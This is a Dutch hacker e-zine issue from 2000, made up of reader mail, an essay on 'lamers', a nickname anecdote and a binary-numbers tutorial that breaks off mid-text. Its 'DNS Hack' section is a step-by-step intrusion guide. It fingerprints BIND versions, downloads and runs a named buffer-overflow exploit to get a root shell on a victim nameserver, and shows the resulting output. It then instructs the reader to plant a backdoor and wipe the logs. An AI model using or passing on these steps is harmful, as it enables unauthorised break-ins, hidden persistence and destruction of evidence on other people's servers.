Copy Link
Add to Bookmark
Report
Hackers 4 Hackers #0C
Hackers 4 Hackers Issue 0C, released on 12-11-2000
___ ___ _____ ___ ___
/ | \ / | | / | \
/ ~ \/ | |_/ ~ \
\ Y / ^ /\ Y /
\___|_ /\____ | \___|_ /
\/ |__| \/
+-+-+-+-+-+-+-+ +-+ +-+-+-+-+-+-+-+-+-+-+
|h|a|c|k|e|r|s| |4| |h|a|c|k|e|r|s| |0|C|
+-+-+-+-+-+-+-+ +-+ +-+-+-+-+-+-+-+-+-+-+
http://www.hackers4hackers.org
'12-11-2000', Momenteel 1172 lezers.
Om je aan te melden bij de maillijst kan je een mailtje sturen naar
subscribe@hackers4hackers.org met als titel "subscribe h4h emailadres"
Of je kan je online aanmelden op http://www.hackers4hackers.org
Artikelen en dergelijke kun je mailen naar artikel@hackers4hackers.org. Vragen
kun je mailen naar de desbetreffende auteur of naar post@hackers4hackers.org.
Uitspraak:
[<somesleep> Asby: ik erger me aan je arrogantie] (somesleep = gerrie)
Enkele interessante sites:
http://itris.eu.org
http://www.security.nl
http://www.hit2000.org
http://hier.is/Triples
http://www.whatis.com
http://viper.dmrt.com
http://www.klaphek.nl
http://www.hack.vuurwerk.nl
http://kickme.to/hackfaq
http://www.startplaza.nu
http://www.dsinet.org
http://www.satl.com/c/hackerHOWTO.html
http://packetstorm.securify.com/docs/hack/i.only.replaced.index.html.txt
Leuke kanaaltjes op IRCnet:
#h4h
#hit2000
#nlcoders
#freeworld
01. Disclaimer............................................... (Redactie)
02. Inleiding................................................ (Redactie)
03. Lezerspost............................................... (Redactie)
04. Lamers................................................... (Nynex)
05. DNS Hack................................................. (The Itch)
06. Wat betekend mijn nick................................... (Asby)
07. Cijfertjes............................................... (PhantomLord)
08. Evenementen.............................................. (Redactie)
09. Windows '98 zonder Internet Explorer..................... (AciN)
10. De Basis Van Shellscripting (deel 2)..................... (Max)
11. Windows Register tips en trucs (deel 2).................. (Asby)
12. Eindwoord................................................ (Redactie)
-------------------------------------------------------
01. Disclaimer
-------------------------------------------------------
We zijn niet verantwoordelijk voor datgene wat jullie met deze informatie doen.
Deze informatie dient alleen voor educatieve doeleinden. Als je in problemen
komt, kan je ons niks verwijten. Gebruik maken van deze informatie kan strafbaar
zijn. Meningen van auteurs hoeven niet hetzelfde te zijn als die van de
redactie.
Correspondentie met de redactie is mogelijk per email :
Algemeen - h4h-redactie@hackers4hackers.org
Vragen e.d. - post@hackers4hackers.org
Artikelen - artikel@hackers4hackers.org
Asby (Hoofdredacteur) - asby@hackers4hackers.org
Berry (Website + Eind redactie) - berry@hackers4hackers.org
Ivo (Redactie + IRC Beheer) - ivo@hackers4hackers.org
Nighthawk (Redactie) - nighthawk@hackers4hackers.org
Tozz (Redactie) - tozz@hackers4hackers.org
Viper (Redactie) - viper@hackers4hackers.org
-------------------------------------------------------
02. Inleiding
-------------------------------------------------------
Nou het is dan iemand eindelijk gelukt. Een onderdeel van de h4h site is
gehackt. Wel te weten de poll we hebben er een leuke afbeelding van gemaakt en
deze in onze files sectie gezet. We zijn nog op zoek naar een andere poll die
wel veilig is... Volgende nummer zal de "dader" over zijn hack een artikeltje
schrijven. Of hij moet af zien van het *Gratis t-shirt ;)
Verder gaan we het dus voorlopig maar niet over poll's hebben ;)
Microsoft is ook een aantal keer de klos geweest de laatste tijd. En ja er zijn
t-shirt te bestellen met de tekst "I hacked microsoft and all I got was this
lousy source code." Op www.cafepress.com/microhack... Of dat lame is om in z'n
shirt rond te lopen of juist l33t kun je misschien in het artikel van Nynex
lezen ;)
Met de redactie en een aantal andere hackers hebben we ook nog info-security
bezocht. Dit was de beurs over computer beveiliging. Naast de gezellige mensen
van security.nl(tja zij waren de enige die ons bier aanboden ;) liepen er meer
verkopers rond dan mensen die echt een clue hadden. Ook was er weinig linux
vertegenwoordigd, de linux die er was zat waarschijnlijk in de diverse VPN
kastjes maar als je vroeg welke kernel die firewall draaide zeiden ze dat het
allemaal hardware was... Maar goed het was in ieder geval een gezellige dag en
zeker de moeite waard !
Ook de meeting in haarlem was zeer geslaagd... Ook al was de plaatselijke ballen
bak in de mc donalds hier niet zo blij mee, meer over de meeting in het verslag
dat in de volgende h4h zal komen !
De redactie
-------------------------------------------------------
03. Lezerspost
-------------------------------------------------------
schrijf eens een artikel over anti-hack
[anti-hack? Is dat een soort firewall ofzo?]
BlAcKatAcK
[De broer van onze belgische vriend?]
--
maak es een aantrekkelijke intro
[Jah!! Doen we meteen, zodat het minimaal een kwartier duurt voordat de
flash is geladen, en dat je dan geen idee hebt waar je op moet klikken.
Ideaal voor mensen zoals jij die toch niets met de info weten te doen.]
or something like that....
[Ow, het mag ook wat anders zijn, zoals _geen_ intro? Ja dat lijkt me wel
wat. Lekker plain en makkelijk bereikbaar. Voor de info, niet voor het
uiterlijk.]
zodat iedereen alleen al naar deze page gaat voor het uiterlijk
[Argh, dus toch om het uiterlijk. Heeft mama je nooit geleerd dat
schoonheid van binnen zit? Dat zeggen alle lelijke mensen namelijk]
maby gaat de populairiteit dan nog es 20 % omhoog
[maby? wdn is maby?, en waar is die 20% op gebasseerd? Ik ben wel benieuwd
naar de statistieken]
..........
[Ja anders gooi je er maar wat puntjes tussendoor]
maarjah waar ik eigenlijk voa kwam was om dit....
[Ik zit op het puntje van me stoel van de spanning wat je ons gaat
mededelen]
artikels over Red Hat 7.0 pro..
[........ mijn beurt voor punjtes ja]
becaurse there's an nice grapical firewall on it
[grapical? heeft dat iets te maken met grape fruit?]
and i don't understand it ......
[I would never have guessed that, why english btw?]
maareh voa de rest iedereen de groetuh
[Nou de groeten terug van mij, van de rest weet ik het niet]
P.S. let niet op het vaaguh schrijvuh van mij
[Niet op letten? Als ik dit soort dingen ga negeren dan heb ik strax geen
lezerspost meer]
want ik ben zeer WAUS in de BOTTUH
[ongetwijfeld]
whitespace
[N|ghtHawk]
--
Geacht,Heren
[Dag knul]
Ik wil een paar van serailnummer
[serail nummer? Heeft dat iets te maken met rails? Trein nummers ofzo?]
van enkele programmas
[ahh, iets met programma's dus]
maar later zullen jullie van mij horen.
[ahh, das fijn]
Ik zit op curacao
[Ik in Nederland]
en er is veel te doen.
[Hier ook, ongetwijfeld....ergens]
Junny
[N|ghtHawk]
--
ik wil leren hacken
[Ik wil leren meisjes versieren]
en ik dacht nou probeer ikhet hier eens
[dat was dan een leuke gedachte]
mail mij
[SIR, YES, SIR! In de lezerspost staan ook goed?]
andrys wierstra
[N|ght Hawk]
--
me gustara que me ensearan a hackear, comtctenme.
{vertaling (fouten voorbehouden): Ik zoek een hacker, contact mij}
[SIR, YES, SIR! Probeer het eens netjes en in het Nederlands, wie weet
haal je dan nog eens een keer de lezerspost]
Adrin
[N|ghtHawk]
adrcenteno@hotmail.com
[NightHawk@hackers4hackers.org]
--
Ik heb een vraag
[Daar was ik al bang voor]
hoe kan ik achter iemand zijn password
[En daar ook voor, zeker hotmail password?]
van msn komen
[Hmmz is msn niet hetzelfde als Hotmail? Dan dus weer een mailtje goed
geraden, doe mij maar voor 450 gulden de stereo-combi-set Hans.]
Sander
[Hawk]
srbosman@hotmail.com
[NightHawk@hackers4hackers.org]
--
hoi
[oi oi]
ik ben op zoek
[ik ook]
naar Exact 7.12 serielnr.
[Ik naar Michelle]
Hans Georg Horzella
[Is dat een pizza met kaas?]
[overigens nogal onbeschoft af te sluiten met een pizza ipv je naam]
--
geachte
[zo, zo, doe maar duur, dan komt er vast een intelectuele vraag]
ik had graag het volgende geweten
[ik ben benieuwd hoe intelectueel de vraag is, de dikke vandale ligt op em
schoot voor de moeilijke woorden]
is het mogelijk
[<mogelijk [1201-1250 van 'mogen' in de betekenis 'kunnen'] I (bn.; vgl. –
lijk) 1 kunnende gebeuren, kunnende gedaan worden, tgov. onmogelijk:
mogelijk is in het algemeen datgene waarvan we niet weten of het gebeurt
of niet. Maar ook wat er gebeurt is, aangezien het gebeurt, zeker
mogelijk (Krol);bij God zijn alle dingen mogelijk:ik houd dat niet
voor mogelijk; een vierkante cirkel is logisch niet mogelijk; hoe is het
mogelijk, dat je je daarmee vergist hebt?, hoe kon dat gebeuren; hoe is
het godsterwereld mogelijk!, ter uitdrukking van geergerde
verwondering; al het mogelijke doen; dat is het enige mogelijke; zo
of indien mogelijk als het gaat; zo gauw, goed, snel mogelijk; -
(fil.) in potentie aanwezig: Aristoteles leerde dat al het werkelijke uit
het mogelijke voortkomt 2 bestaanbaar (vooral in de verb.): alle
mogelijke -, om een grote verscheidenheid aan te duiden: alle
mogelijke toestanden, soorten. dingen; bij alle mogelijke
gelegenheden; ik kreeg alle mogelijke steun; alle mogelijke middelen,
alle die er zijn; met de meest mogelijke moeite 3 eventueel (I):bij
mogelijke moeilijkheden kunt u zich tot mij wenden II (bw. van
modaliteit), misschien: mogelijk kom hij vandaag nog.> aldus de Dikke
Van Dale, zo dat was ff oefenen, op naar de intelectuele vraag]
{waag het niet om dit bovenstaande niet gelezen te hebben, ik heb me er
niet voor niets drie kwartier op zitten typen}
om wanneer iemand die gebruikt maakt van icq (versie 2000a)
[Ok, de Dikke Van Dale staat weer netjes in de kast, en de tranen staan in
me ogen]
en wanneer hij online is met iemand anders (chatten,berichten versturen) dat ik
of iemand anders kan zien met welke persoon (of icq nummer ) die ene online is
??????
[Hmmz, ben je bang dat je vriendin vreemdgaat? Of stalk je iemand gewoon?]
zo ja ,
[Nee dus]
kunnen jullie mij dan ook eens laten weten hoe dat in zijn werk gaat en wat ik
hiervoor moet doen
[Nee dat kan ik niet want dat wil ik niet, kom eerst maar met die
intelectuele vraag]
dank bij voorbaat
[graag bij gedaan]
peter.vanden.broeck@pandora.be
[Ahh een belg, verklaard dat dat geachte?]
[N|ghtHawk]
--
Ik wil alles kunnen lezen
[Dan moet je anar school gaan om dat te leren, dat lezen.]
over hoe je moet hacken,
[Dat was wel weer te verwachten]
hoe je dat doet.
[Leer eerst maar lezen]
Corrospondeeren met iemand die er goed in is is ook wel leuk
[Jah, dat lijkt me ook wel leuk, maarja waar vind je die?]
bigthijs
[Little Hawk]
--
Kan ik bij iemand inbreken
[Hmmz, ik neem aan dat je dat zelf wel weet of jij dat kan. Aan je
intelligentie te schatten echter denk ik van niet]
in zijn computer
[Dat lukt je waarschijnlijk al helemaal niet]
en in zijn bestanden kijken
[Dat kijken moet je dan nog net wel lukken, de rest schat ik te hoog voor
je]
hoe doe ik dat?
[niet..]
is hier misschien een programma voor
[Vast wel ergens, alleen denk niet dat jij daar mee kan werken]
rullens-tweewielers
[Hmmz, wil je bij de concurrent kijken hoeveel driewielers hij voor de
komende zomer heeft besteld?]
--
qwq
[oh..]
GFDDXGF
[N|ghtHawk]
aaaaaa@aaaaaaa.a
[nighthawk@hackers4hackers.org]
--
S
[oh..]
asdasd
[ey, probeerde jij net ook al niet te mailen of hebben we contact met een
raar sprekend buitenaards volk?]
aaa@aa.a
[nighthawk@hackers4hackers.org]
--
Hallo,
[waaaaazzzzzzuuuuuppppp]
Kunnen jullie mij vertellen of er een programmatje is
om deze bestanden leesbaar te maken??
[Welke bestanden heb je het over? Je sex.jpg.vbs?]
En zo ja, waar kan ik die het beste vandaan halen?
[errr, die bestanden? Gewoon op dezelfde manier als je aan deze bent
gekomen. Waarschijnlijk via #teenchat]
Dus, wat is de beste?
[Je adem inhouden, nee het kan geen kwaad als je dat meer dan 5 minuten
kan]
Alvast bedankt,
[Het plezier was geheel aan mijn kant]
Met vr. gr.
[Zonder vr. gr.]
S. G.
[N.H.]
--
Dat blad hackers4hackers kun je toch alleen via het internet zien
[Als je het download kan je het netjes op je eigen computertje lezen]
en hoe kun je lidwoorden?
[lidwoorden? Hoe je een 'lid' wordt? Hmmz, ik denk dat je daarvoor bij de
dokter moet zijn, niet bij ons. Maar met de techniek van
tegenwoordig moet het vast wel kunnen.]
Groetjes Dirk.
[Groetjes Hawk]
--
Beste meneer/mevrouw
[EY!, dat ik de SceneGay ben betekend niet dat iedereen mij zomaar kan
lopen beledigen]
Ik vroeg mij af hoe je leert om te hacken/cracken.
[Hmmz, waar heb ik die vraag eerder gehoord..]
Zou je mij dat misschien uit kunnen leggen?
[Misschien, en ff, maar denk dat je pech heb]
Zijn er bijv. bepaalde boeken die je aanbeveelt
[Ja]
(is er misschien een boek als hacken voor beginners ofzo
[Ja dat is er, het heet: "Hack mee op de sociale werkplaats"]
(ik heb hier overigens al naar gezocht bij diverse boekhandels maar niets
gevonden)
[Je moet ervoor ook bij een sociale werkplaats werken, en het moet voor
jou niet zo moeilijk zijn daar een baan te vinden]
of moet je om te beginnen heel goed kunnen programmeren?
[Jij wel]
enzo ja? in welke programmeer programma's?
[In mIRC, daar zit mIRCscript in, dat is ideaal voor jou]
Zijn er bepaalde programma's die je er voor nodig hebt?
[Ik denk dat jij het zo ook wel niet red. Daar heb je geen hulpmiddelen
bij nodig]
Bij voorbaat dank,
[Bij voorbaat graag gedaan]
vincent
[N|ghtHawk]
--
Hey,
[hoi hoi]
ik wil leren hacken zonder trojan
[Hacken is altijd zonder trojan schat]
enuh ik wil programeren enal dus met C++ werken enz
[hmmz, waar heb je mij dan voor nodig?]
kan je me dat mischien leren?
[ahh, daarom. Nee dat kan ik niet. Ik kan alleen mensen voor lul zetten in
de lezerspost.]
SQuaDRoN
[N|ghtHAwK]
--
hoi
[hoi]
ik ben joey
[Ik ben N|ghtHawk]
(12jaar)
[18 jaar, en je doet donald duck na?]
en wil graag weten hoe ik aan een IP password kom
[Wat is een IP password?]
ik gebruik een programma dat sub7 heet
[ahh, dat verklaard weer een hoop]
en in dat programma heb ik een IP nummer gescant
[Das leuk om te weten, en wat voor gevoel gaf dat nou?]
als ik in die computer wil(van datIP adres)
[Waarom wil jij in die computer?]
moet ik eerst een password hebben
[Het zit ook niet mee he]
hoe kan ik daar aan komen??????????????????????????????????
[Ik wil het met jou helemaal niet hebben over komen, en je vraagtekentoets
blijft een beetje hangen. Plakt vast door dat komen van je]
groetjes joey
[groetjes N|ghtHawk]
--
hoe email te hacken van bnners en andere beroemdheden
[netzoals bij de rest, dacht je dat bnners en andere beroemdheden een
aparte soort email hadden?]
errug nieuwschierig
[ik ook, maar naar andere dingen dan hoe Marco Borsato doorgeeft aan
Leontine dat ze zijn groene sokken moet wassen]
groetjes,
[groetjes]
new lurker
[old lamer]
aafke
[N|ghtHawk]
-------------------------------------------------------
04. Lamers
-------------------------------------------------------
Lamers
Jaja, ik weet het, 'Oh, kijk, Nynex schrijft wat over lamers, daar weet
ie tenminste alles van', 'takes one to know one, blablabla'. Boeie :P
--
lame [leim] kreupel (ook van verzen), gebrekkig; slap, mat, zonder
overtuiging (... he said ~ly); nietszeggend, armzalig (excuse); ~duck
invalide; zwakkeling; maatschappelijke schipbreukeling
--
Wat is nou precies een lamer? Iemand die vraagt hoe je sub7 gebruikt op
irc? Iemand die Microsoft root en alles wat ie maar ken vinden
verwijdert? Iedereen die Windows geïnstalleerd heeft op z'n compie? Of
gewoon iedereen die niet into Computer Security is? Bijna iedereen heeft
wel zijn eigen mening over het begrip lame.
Ik zelf zit vaak op IRC. Ik word ook vaak lamer genoemd, en terecht :).
Ik heb [bijna] geen enkele kennis van computer security, linux,
programmeren, etc, etc. Maar word ik daarom wel lamer genoemd? Heeft
lame zijn met je kennis over computers ed te maken? Kijk, als ik iemand
op IRC zie en die heeft het over netbus, ok, dan is er geen discussie.
Lame. Maar ik heb ook mensen die blij waren dat ze met hulp van andere
hun BSD bakken up hadden lame genoemd zien worden. Je hebt dus blijkbaar
lame op verschillende niveau's:
1e en meest voorkomende niveau van lameheid, de netbus/virus/hotmail
enzo categorie. Deze categorie heeft in tegenstelling tot de andere wel
met kennis te maken, dit zijn vaak dan beginnende internetters van iets
van 13 tot 16 ofzow die net langs een homestead "Hack Page" zijn
geweest, een 20 jaar oude text over phf hebben gelezen, net iets over
dat überleete telnet gehoord hebben en alle mogelijke nukers, virusen,
trojans, flooders, wardialers enzow downloaden. Can't blame them, ze
weten gewoon niet beter. Want zoals ze op hun computer cursus hebben
geleerd, naar altavista, +hacken +gibson opzoeken, omdat ze net de film
"Hackers" hebben gezien, en de results bekijken.. Je gelooft de
realiteit zoals je die gepresenteerd krijgt. Dus zo iemand zal alles
geloven wat er allemaal staat over zogenaamd 'Hacken'. Ik kan het weten,
ik ben zelf ook zo begonnen. (Niet dat ik nu veel verder ben ;), maar
daar nu ff niet over). Waar komen dan al die achterlijke "Hack" sites
vandaan? Simpel. Van dezelfde soort mensen die ze bezoeken, alleen
kunnen hun Frontpage Express gebruiken. En zo'n bezoeker ziet zo'n site
en denkt, ha zo ben ik ook 3l33t en maakt er ook en, enz enz.
De 2e categorie heeft met jezelf te maken, hoe je je gedraagt. Neem
bijvoorbeeld nou iemand die je over IRC helpt met pijn en moeite Redhat
naast windows 98 te installeren, en die 2 dagen later op IRC zit van "iK
G4h FfEuh een K3rNeltje Bakk3uh biJ eEn Vr13nD." Of zo van "Wacht ff
hoor even SSH implenteren op me IRIX bak, dan gelijk ff me Ipv6
verbinding fixeren, oja en de faculteit hogere informatica van de univ
van adam belde net, ze hebbe problemen met hun beowulfie, moet ik ook zo
heen. ohh, nou dan port ik onderweg in de trein wel even minilinux naar
me gameboy, sluit ik die aan op me gestolen nokia 9110 communicator en
zie ik jullie wel weer op irc." Vat je?
Categorie nummer 3 heeft een beetje met kennis te maken maar zeker ook
hoe je zelf bent. Neem bijvoorbeeld iemand die de 1 na de andere 0day
schrijft, Microsoft en het pentagon root, alles wat ie kan vindern eruit
gooit, bij defcon 100en handtekeningen moet uitdelen, en zijn eigen
radio show krijgt kan ook heel goed lame zijn. Als die bv eens een
keertje tijd zoekt om tussen al die LAN's en TV shows in zijn agenda
eens een keertje op IRC te komen, lekker iedereen die minder weet dan
hij als een mindere beschouwen en lekker dist met zijn superieure
kennis, zo van "Bwah, ik heb geen tijd om met jullie voetvolk te
communiceren, ik moet nu even naar de generale repetitie van de Conan
O'Brian show." Dit is dus Computer Genie + Arrogante Zak + Mediageil.
Which can aslo be considered lame.
Buiten deze 3 categoriën zijn er nog andere vormen van lameheid, en
dan heb ik het over rm'en, deltree's etc. Maar ook over een manier van
informatie zoeken. Je kan rfc's en oreilly's gaan lezen maar ook domme
vragen op irc stellen. Dat heeft weer te maken met gewoon lui zijn zoals
ik. Maar ik sla helemaal nergens op, computers boeien me nix [nouja,
nix] en security/*nix/programmeren kan me nog minder schelen. Go figure
;)
Nou veel meer weet ik eigenlijk niet te vertellen behalve de, ahum,
'conclusie': Lame ben je niet omdat je meer weet dan een ander maar lame
ben je zelf als persoon blablablabla.
--
Nynex, leuke reacties, huwelijks aanzoeken e.d. naar nynex@mail.ru,
bitchmail, dreigbrieven en spam naar labtech@microsoft.com
"I was a teenage appetizer from the planet Sushi"
-------------------------------------------------------
05. DNS Hack
-------------------------------------------------------
howto root another nameserver, explanation of the BIND exploit.
Deze text gaat over het hacken van nameservers.
ik ga niet in details wat nameservers zijn, waar
ze voor zijn enzovoort, alleen hoe je ze kan exploiten :>
allereerst gaan we een vulnerable nameserver zoeken.
dit doe je dmv een scanner of iets dergelijks, wees creatief!
Bind draait op port 53 dus zoek ip's met port 53 open want
dat zijn nameservers.
Wat hebben we dan nog meer nodig ... owja, root op een andere
nameserver :) ja klinkt raar, maar probeer er 1 te pakken te
krijgen en je hebt er zo een hele zooi bij!
Hoe weet je nou of het een exploitable nameserver is?
dat is simpel, type dit:
$ dig @victimip version.bind chaos txt|grep \"8
als je iets van 8.2 of 8.2.1 terugkrijgt zijn ze
waarschijnlijk wel vulnerable, maar als je 8.2.2P2 - P5
tegenkomt zijn ze niet vulnerable (alhoewel ik een paar dagen geleden
geruchten hoorde over een exploit voor 8.2.2P5 maarja zoals ik zei,
geruchten) ... misschien ouwere versies ook, maar dat heb ik niet getest.
Als je niks terugkrijgt na het dig commando, kunnen ze
vulnerable zijn, want misschien is de source geedit zodat
de server deze info niet geeft, anyway, gewoon proberen :)
Zo, alles hebben we, een victim, root op een nameserver, nu
kunnen we beginnen. Kijk als eerst wat je hostname is op
de nameserver waar je al root op heb, voor het gemak noemen
we die even hackerbox.com. Het volgende wat we gaan doen
is named killen op onze hackerbox.com (killall -9 named)
Nu compilen we onze exploit t666.c (gcc t666.c -o t666)
(download: http://www.hack.co.za/daem0n/named/t666.c)
en runnen hem, je moet zelf kijken met welke optie, omdat het
aan je target ligt wat je attackt, laten we zeggen dat is linux
dan run je hem zo: ./t666 1
thats it, log nu een 2e keer in op hackerbox.com en type dit:
# dig @victim blabla.hackerbox.com
Nu laat je ons target de ip opzoeken van blabla.hackerbox.com Dat doet ons
target door bind te raadplegen op hackerbox.com maar bind hebben we
vervangen door onze exploit, dus zodra ons target connect met
hackerbox.com krijgt ie niet bind te spreken maar onze exploit, en die
past een bufferoverflow toe waardoor je een rootshell krijgt. Als alles
goed gaat zie je dit gebeuren nadat je het dig commando heb gegeven:
(let op dat je het victimip ziet en daarna for blabla.hackerbox.com omdat
je net de pech kunt hebben dat een andere nameserver of een andere service
bind wou raadplegen op je machine vanwaar je de exploit runt!)
# ./.t666 1 Received request from victimip:1050 for blabla.hackerbox.com
type=1
Entering proxyloop..
Linux victimip 2.2.5 #1 Fri Sep 3 15:44:11 JST 1999 i686 unknown
/
uid=0(root) gid=0(root)
en tsjakka ... root is gained :)
alleen nu ff goed opletten ... zodra je dit hebt bereikt, is bind ook
gecrasht op je victim machine ... en aangezien je alle logs en alles
goed wil restoren moet je hem ook weer herstarten, alleen doe dit NIET
vanaf je rechtstreekse root die je nu hebt, plaats een backdoor en
quit, en log dan opnieuw in via je backdoor en restart bind
(/usr/sbin/ndc start) en verwijder de logs en tada, klaar ! :)
thanx to the dudes van ADM die deze coole exploit hebben geschreven
BSE kicks ass in 2000
- The Itch
-------------------------------------------------------
06. Wat betekend mijn nick
-------------------------------------------------------
Wat betekend mijn nick?
Nickname: Asby
Historie van nicks
Nou mijn historie van nick is nogal erg klein te noemen. Voordat ik deze
nick aannam had ik de nick 'Double B'. Maar dat vond ik op een gegeven
moment niks meer en toen heb ik een nieuwe verzonnen. En dat is Asby
geworden.
Hoe kom ik op die nick
Dit is een veel gestelde vraag aan mij. Ok, de 'hoe hack ik hotmail'-vraag
staat nog steeds op nummer 1.
Alweer een hele tijd terug, toen de cd 'Ixnay of the hombre' uitkwam van
Offspring, las ik een interview met hun over deze cd.
Aan hun werd onder andere de vraag gesteld, hoe ze op de naam van de cd
kwamen.
Ze vertelden dat er een Zuid Amerikaans woordspel bestaat onder kinderen.
Bij elk woord dat je uitspreekt zet je de eerste letter achteraan en plakt
daar 'ay' achter. Dus Nix werd Ixnay.
Toen ik dat las dacht ik eerst van: 'he, dat komt ook voor in Monkey Island'
en vervolgens dacht ik van: 'he dat kan ik ook doen met mijn eigen naam.'
Ik heet dus Bas. Dus ik zette de eerste letter achteraan en plakte er ay
achter. Toen had ik 'Asbay' en aangezien dit dan erg veel op Asbak lijkt
vond ik wel dat ik een letter mocht weghalen en aangezien er toch twee a's
instonden was de keus al snel gemaakt.
En sinsdien heet ik Asby.
Het leuke van zo'n vage (nouja, vaag) nick is dat mensen niet kunnen zien of
je mannelijk of vrouwelijk bent. Ik heb al herhaaldelijk allerlei
aanbiedingen gehad van mannen waarop ik maar niet verder inga.
Voor de rest zijn er ook mensen die zich graag voordoen als mij. Er is
herhaaldelijk aan mij gevraagd of ik de Asby was die op dalnet in #zebulun
zat. Maar nee, dat ben ik dus niet.
Ik heb momenteel zelfs een K-line op dalnet. Vraag me niet hoe ik er aan
kom, want ik heb ook geen idee.
Toen ik toendertijd die nick nam, was ik de enige ermee, en er bestond geen
enkele domeinnaam met mijn nick erin. Tegenwoordig heb je www.asby.com en
zijn er meerdere mensen die net zo stoer willen wezen als mij. Zo heb ik wel
eens op IRC een Italiaan gehad die mijn nick had. Gelukkig had hij hem niet
lang en heb ik hem nooit meer gezien. Een leuk detail is nog, die Italiaan
draaide het Pizza Script (en dat is echt waar).
Wat vindt de redactie van mijn nick
Asby:
Ik vind het wel een stoere nick... he, dat ben ik zelf...
Berry:
Tja mijn nick is gewoon een verbastering van de gekozen nick bermuda... dus
ben eigenlijk wel jaloers op jouw history...
Ivo_:
ehhh, sja ik ken dit verhaal al een paar jaar (sinds de #mgg tijd :) ) dus
het maakt weinig indruk. Niet iedereen kan zo'n originele nick hebben als ik
he :P
N|ghtHawk:
Aangezien je me broer bent, zie ik je nog steeds als Bas. Dus
voor mij heeft de nick Asby weinig betekenis. En aangezien ik dit verhaal al
jaren ken is het ook niet echt een openbaring :-).
-------------------------------------------------------
07. Cijfertjes
-------------------------------------------------------
Allemaal getalletjes en cijfertjes
In dit stukkie text is een eerste deel uit een serie die als doel jullie
wat basic kennis van dat computertje bij te brengen.
Dit stukje gaat dus niet over sploits of over een of ander systeem, dit
gaat over de basis van dat alles.
We beginnen als eerst met wat getallen-stelsels.
De computer werkt in tegenstelling tot ons met het binaire
getallenstelsel (bin of b), wij werken met het decimale stelsel (dec of
d).
Decimaal = tien ,het tien tallige stelsel dus, 0 tot en met 9.
Dit is voor mensen logisch, we hebben immers tien vingers en tien tenen
(de meeste van ons althans, sorry wie we hiermee kwetsen), dus gebruiken
wij ook een talstelsel met tien verschillende karakters (0123456789,
duh?).
Een microprocessor werkt met twee waardes, 0 volt en 5 volt dus
gebruiken we hier het binaire (tweetallige stelsel) 0 en 1.
Iets wat de waarde 0 of 1 heeft noemen we een bit.
Een bit kan van alles voorstellen, een getal, een letter, een woord een
kleur etc.
Wat hetgene is waar de bit de waarde van weergeeft is door de
programmeur zelf te bepalen.
Het bit zelf blijft echter een 0 of een 1.
De meeste processoren werken niet met enkele bitjes, ze werken met
groepen bits.
Een groep van:
- 4 bits heet een nibble
- 8 bits heet een byte
- 16 bits heet een word
- 32 bits een dubble word.
In een byte zitten dus twee nibble's, het linker nibble wordt het High
Nibble genoemd en het rechter nibble het Low nibble.
In een word zitten weer twee bytes etc.
De processoren uit de 80x86 serie werken met bytes.
Vandaar dat het geheugen ook altijd in bytes en niet in bits wordt
uitgedrukt.
Als we iets in een hoeveelheid bits uitdrukken, is het meestal bij
communicatie zoals bij modems e.d..
Tijd voor wat sommetjes:
regels vooraf:
- ^ staat voor macht, dus 2^2=4
- iets tot een macht 0 is altijd 1!
het getal 10 zoals de meeste mensen het kennen (decimaal) is 1 x 10 ^1
1 decimaal = 1 x 10 ^0
100 decimaal = 1 x 10 ^2
1000 decimaal = 1 x 10 ^3
0.1 decimaal = 1 x 10 ^-1
de macht staat ook voor het aantal nullen dat tussen de komma en het
getal komen te staan, positief: "getal" "aantal nullen(macht)" "."
negatief: "." "aantal nullen(macht)" "getal"
Het binaire talstelsel maakt gebruik van twee karakters nl. de 0 en de
1.
1 x 2 ^01
1 x 2 ^12
1 x 2 ^38 (geen 3 slaperd ;p)
1 x 2 ^416
1 x 2 ^432
binaire waardes lopen als volgt op
0001 ( we nemen altijd bits in groepen per 4, dus 4, 8, 16, 32enz)
0010
0011
0100
0101
0110 enz.
het meest rechtse getal is bit 0 het meest linkse getal ( bij dit
voorbeeld ) is bit 3
dus als we een getal hebben van 8 bits dan zijn de bitjes als volgt
genummerd 76543210
we tellen natuurlijk altijd vanaf 0.
bit 0 wordt "Least Significant Bit" (LSB) genoemd, bit 7 wordt in dit
geval "Most Significant Bit" (MSB) genoemd. De MSB is de de bit die het
meest naar links staat.
alle nullen aan de linkerkant, zijn te verwaarlozen, 0001 is hetzelfde
als 1
willen we nu een binair getal omzetten naar decimaal dan passen we de
volgende methode toe:
binair getal 1101110
1 1 0 1 1 1 0
| | | | | | |_ 0 x 2 ^0 = 0 <--LSB
| | | | | |_ 1 x 2 ^1 = 2
| | | | |_ 1 x 2 ^2 = 4
| | | |_ 1 x 2 ^3 = 8
| | |_ 0 x 2 ^4 = 0
| |_ 1 x 2 ^5 = 32
|_ 1 x 2 ^6 = 64 <--MSB
______ +
110 decimaal
ok dit is niet zo moeilijk, maar hoe doen we het nou van decimaal naar
binair?
als we een decimaal getal 110 hebben en we willen de binaire waarde
ervan doen we het volgende:
we moeten de macht vinden van 2 (2 omdat we binair willen) waarvan de
uitkomst zo groot mogenlijk is,
maar niet groter is dan het decimale getal.
we proberen dus maar gewoon wat machten van 2.
2 ^8 = 256 :te groot
2 ^7 = 128 :te groot
2 ^6 = 64 :goed
we noteren vanaf dit punt voor iedere goed gevonden macht een 1 en voor
iedere niet passende macht een 0
we trekken het getal 64 van het decimale getal 110 af, ons nieuwe getal
wordt dus 46, we noteren een 1
nu moeten we weer een macht zien te vinden, we gaan verder bij de macht
waar we gebleven waren:
2 ^5 = 32 :goed noteer een 1
het nieuwe getal wordt 46-32=14 , we gaan weer verder..
2 ^4 = 16 :te groot noteer een 0
2 ^3 = 8 :goed noteer een 1
het nieuwe getal wordt 14-8=6
2 ^2 = 4: goed noteer een 1
6-4=2
2 ^1= 2: goed noteer een 1
2-2=0
2 ^0 = 1: te groot noteer een 0
lager dan nul kunnen we niet dus we zijn klaar
we hebben dus deze bitreeks genoteerd 1101110.
dit klopt dus ( zie voorgaande voorbeelden )
-BCD-
Een manier om digitaal decimale getallen weer te geven, is door gebruik
te maken van Binary Coded Decimal (BCD dus).
BCD geeft ieder decimaal getal weer met een vier bits woord.
het getal 1011001 binair wordt volgens BCD 1000(8) 1001(9).
Het voordeel van deze codering is dat de eenheden, tientallen,
honderdtallen etc gescheiden worden.
Het is dan simpel om je getal op een 7-segment display zichtbaar te
maken (7 led's in display dus 4 lijntjes per display).
Als je het getal 89 zou willen laten zien op een display zouden de
eerste 4 bits de tientallen (8) weergeven,
en de laatste vier bits de eenheden (9), het getal waarbij de meeste
ledjes branden is het getal 8.
Het getal 8 kan door 7 streepjes (led's) worden gevormd (zie ASCII geval
